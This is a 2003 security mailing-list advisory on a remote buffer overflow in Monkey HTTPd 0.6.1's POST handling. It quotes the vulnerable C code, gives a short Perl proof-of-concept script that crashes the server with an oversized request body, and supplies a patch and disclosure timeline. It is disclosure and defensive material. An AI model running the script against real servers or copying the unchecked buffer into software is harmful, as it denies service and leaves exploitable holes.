[UNIX] Monkey HTTP Daemon Remote Buffer Overflow

• Previous message: support@securiteam.com: "[NT] BadBlue Arbitrary Administrative Actions Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

From: support@securiteam.com
To: list@securiteam.com
Date: 21 Apr 2003 13:43:36 +0200

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

In the US?

Contact Beyond Security at our new California office
housewarming rates on automated network vulnerability
scanning. We also welcome ISPs and other resellers!

Please contact us at: 323-882-8286 or ussales@beyondsecurity.com
- - - - - - - - -

  Monkey HTTP Daemon Remote Buffer Overflow
------------------------------------------------------------------------

SUMMARY

 <http://monkeyd.sourceforge.net/> Monkey is a "Web server written in C
that works under Linux. This is an open source project based on the
HTTP/1.1 protocol. The objective is to develop a fast, efficient, small,
and easy to configure web server". A buffer overflow vulnerability in the
product allows remote attackers to cause it to execute arbitrary code.

DETAILS

Vulnerable systems:
 * Monkey HTTPd version 0.6.1

Immune systems:
 * Monkey HTTPd version 0.6.2

A buffer overflow vulnerability exists in Monkey's handling of forms
submitted with the POST request method. The unchecked buffer lies in the
PostMethod() procedure. The buffer allocated on line 3 of PostMethod():

 char buffer[MAX_REQUEST_BODY];

Is of size MAX_REQUEST_BODY, which is defined as follows in monkey.h:

 #define MAX_REQUEST_BODY 10240 /* Maximo buffer del request */

The security check on line 10 of the procedure:

 if(content_length_post<=0){

Is flawed. This results in a buffer overflow inside the loop below:

 memset(buffer,'\0',sizeof(buffer));
 for(i=4;i<strlen(post_buffer);i++){
  buffer[i-4]=post_buffer[i]; // Buffer overflow
 }

Analysis:
Because the buffer that is overrun is a local buffer, it will reside in
the stack on all architectures. If the system stores the return address on
the stack, the potential for flow control exists. In such a case,
successful exploitation yields the privileges of the monkey binary. An
unsuccessful exploit attempt would cause the server to fail, denying
service to other users.

Exploit:
#!/usr/bin/perl
# monkey-nuke.pl
# Monkey HTTPd Remote Buffer Overflow
# Discovery/Exploit by Matthew Murphy
use IO::Socket;
print STDOUT "What host to connect to \[\]\: ";
$host = trim(chomp($line = <STDIN>));
print STDOUT "What port to connect to \[80\]\: ";
$port = trim(chomp($line = <STDIN>));
$addr = "$host\:$port";
print STDOUT "What script to submit to \[\/cgi-bin\/test\.pl\]\: ";
$script = trim(chomp($line = <STDIN>));
$buffer = "A"x11000;
$exploit = "POST /$script HTTP/1.0\r\n";
$exploit.= "Content-Type: application/x-www-form-urlencoded\r\n";
$exploit.= "Content-Length: 11000\r\n\r\n";
$exploit.= "$buffer\r\n\r\n";
$f = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$addr);
print $f $exploit;
sleep 5;
undef $f;

Solution:
In monkey.c, replace the line:

 if(content_length_post<=0){

With:

 if(content_length_post<=0 || content_length_post >= MAX_REQUEST_BODY){

Stop the server, re-build your binary, and restart the server.

Vendor response:
The vendor was contacted on March 15, a fix was made public 9 days later
on March 24. The fixed version, Monkey 0.6.2 is available at:
<http://monkeyd.sourceforge.net/get_monkey.php?ver=4>
http://monkeyd.sourceforge.net/get_monkey.php?ver=4

Disclosure timeline:
March 15, 2003: Initial developer notification
March 18, 2003: Response from Eduardo Silva (edsiper@yahoo.es) indicates
that vulnerability will be fixed by March 24
March 23, 2003: Final contacts with developer
March 24, 2003: Monkey HTTPd 0.6.2 released
April 20, 2003: Public disclosure

ADDITIONAL INFORMATION

The information has been provided by <mailto:mattmurphy@kc.rr.com>
Matthew Murphy.

========================================

This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

• Previous message: support@securiteam.com: "[NT] BadBlue Arbitrary Administrative Actions Vulnerability"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]